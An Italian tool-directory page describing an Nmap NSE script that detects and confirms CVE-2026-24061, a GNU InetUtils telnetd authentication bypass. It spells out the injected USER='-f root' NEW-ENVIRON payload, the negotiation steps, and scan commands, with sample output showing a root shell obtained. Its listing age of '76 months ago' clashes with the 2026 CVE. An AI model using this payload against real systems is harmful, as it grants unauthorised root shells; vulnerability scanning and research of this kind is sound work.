Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24061-NSE — Lo script esegue una negoziazione Telnet completa rispecchiando l'esatta sequenza di byte di una sessione client telnet -a reale. | Kitploit
Strumenti/GitHubGitHub/hd0x01/cve-2026-24061-nse
Scanner di VulnerabilitàExploitSicurezza di RetePenetration TestingAutenticazione
GitHubhd0x01/cve-2026-24061-nse

CVE-2026-24061-NSE

Lo script esegue una negoziazione Telnet completa rispecchiando l'esatta sequenza di byte di una sessione client telnet -a reale.

Vedi Repository
76 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24061 — Bypass dell'autenticazione in GNU InetUtils telnetd

Script di rilevamento Nmap NSE

Nmap NSE CVE CVSSv3 License


Panoramica

Questo script Nmap NSE rileva CVE-2026-24061, una vulnerabilità di bypass dell'autenticazione in GNU InetUtils telnetd versioni 1.9.3 fino a 2.7.

Inviando una variabile d'ambiente USER appositamente modificata nella forma durante la negoziazione delle opzioni Telnet, un attaccante non autenticato può ottenere una shell con i privilegi dell'utente locale specificato — incluso — .

-f <username>
root
senza fornire alcuna password

Uso previsto: Solo test di penetrazione autorizzati e valutazione delle vulnerabilità.
Eseguire questo script contro sistemi senza esplicita autorizzazione scritta è illegale.


Dettagli della vulnerabilità

CampoValore
ID CVECVE-2026-24061
Versioni affetteGNU InetUtils telnetd 1.9.3 – 2.7
Punteggio CVSSv39.8 Critico
VettoreCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TipoBypass dell'autenticazione (CWE-287)
Divulgazione2026-01-01

Come funziona

GNU InetUtils telnetd utilizza l'opzione Telnet NEW-ENVIRON (RFC 1572) per ricevere variabili d'ambiente dal client durante la fase di negoziazione. Il programma login(1) viene quindi invocato con quelle variabili.

La vulnerabilità nasce dal fatto che telnetd passa la variabile USER direttamente a login senza sanificarla. Il programma login su Linux accetta un flag -f <user> che significa "pre-autenticato, non controllare la password". Iniettando USER="-f root" tramite il payload NEW-ENVIRON, l'attaccante bypassa completamente l'autenticazione.

root@kitploit:~
Client → Server:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Risposta del server:  avvia login -f root  →  shell root, nessuna password richiesta

Dettagli dello script

CampoValore
Nome filetelnet-vuln-cve-2026-24061.nse
Categorievuln, exploit, intrusive
PortaTCP/23 (telnet)
Testato suNmap 7.94 / 7.98, Windows e Linux

Metodo di rilevamento

Lo script esegue una negoziazione Telnet completa che replica la sequenza esatta di byte di una sessione client reale telnet -a (ricostruita da una cattura Wireshark):

  1. Riceve il burst IAC iniziale del server (DO TTYPE, DO TSPEED, DO ENVIRON, …)
  2. Risponde con l'annuncio completo delle capacità del client (WILL TTYPE, WILL LINEMODE, …)
  3. Completa il giro di sub-negoziazione (SB TSPEED, SB ENVIRON, SB TTYPE)
  4. Inietta il payload modificato USER='-f <user>' nel payload IS di NEW-ENVIRON
  5. Completa la sequenza WILL ECHO / DO BINARY / WONT LINEMODE
    (critico — senza questo, telnetd non può finalizzare la configurazione della PTY)
  6. Verifica se il server invia un prompt della shell di login senza una richiesta di password

Stati del risultato:

StatoSignificato
EXPLOITPrompt della shell ricevuto — bypass confermato
LIKELY_VULNPayload ENV accettato, nessun prompt password, ma nessun prompt shell
NOT_VULNPrompt password osservato, oppure negoziazione non completata

Installazione

Linux

root@kitploit:~
# Copia nella directory degli script di Nmap
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# Aggiorna il database degli script
sudo nmap --script-updatedb

Windows

root@kitploit:~
# Copia nella directory degli script di Nmap (regola il percorso se necessario)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# Aggiorna il database degli script (esegui come Amministratore)
nmap --script-updatedb

Utilizzo

Scansione di base (utente predefinito: root)

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 <target>

Specificare un utente diverso

root@kitploit:~
# Forma breve
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <target>

# Forma media
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <target>

# Forma completa
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali <target>

Scansione di un intervallo IP

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24

Output verbose / Debug

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v  <target>   # verbose
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d  <target>   # debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <target>   # traccia hex completa

Output di esempio

Host vulnerabile

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   GNU InetUtils telnetd Authentication Bypass
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2026-24061
|     Risk factor: Critical  CVSSv3: 9.8
|     Description:
|       The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
|       authentication bypass via a crafted USER environment variable.
|       Sending '-f <user>' results in an unauthenticated login shell.
|     Extra information:
|       Authentication bypassed: shell prompt received after injecting
|       USER='-f root' -- no password challenge was presented.
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061

Host non vulnerabile

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet

(nessun output dello script — NOT_VULN è silenzioso per progettazione, convenzione standard di Nmap)


Argomenti dello script

ArgomentoAliasPredefinitoDescrizione
telnet-vuln-cve-2026-24061.usertelnet-user, userrootNome utente da iniettare tramite -f

Note tecniche

Perché WONT LINEMODE è critico

GNU InetUtils telnetd utilizza la negoziazione Linemode (RFC 1184) per determinare la modalità I/O del terminale. Il server invia DO LINEMODE all'inizio della negoziazione, e il client risponde inizialmente con WILL LINEMODE. Dopo lo scambio del payload ENV, il server invia WILL ECHO seguito da DO BINARY. A questo punto il client deve rispondere con WONT LINEMODE per segnalare la modalità carattere-per-carattere — solo allora telnetd può completare la configurazione della PTY (ioctl TIOCSWINSZ) e generare login. Senza questo passaggio, il server registra peer died: Inappropriate ioctl for device e chiude la connessione.

API socket NSE

L'API socket NSE di Nmap differisce dalle convenzioni standard dei socket Lua:

root@kitploit:~
-- Nmap NSE (corretto):
local status, data = sock:receive_bytes(1)
if status == true then -- data è la stringa ricevuta

Riferimenti

  • NVD — CVE-2026-24061
  • PoC di JayGLXR
  • PoC di SafeBreach-Labs
  • RFC 1572 — NEW-ENVIRON
  • RFC 1184 — Linemode
  • Documentazione NSE di Nmap

Disclaimer

Questo script è fornito esclusivamente per test di sicurezza autorizzati e scopi di ricerca. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Ottenere sempre esplicita autorizzazione scritta prima di testare sistemi che non si possiedono.

Scarica lo strumento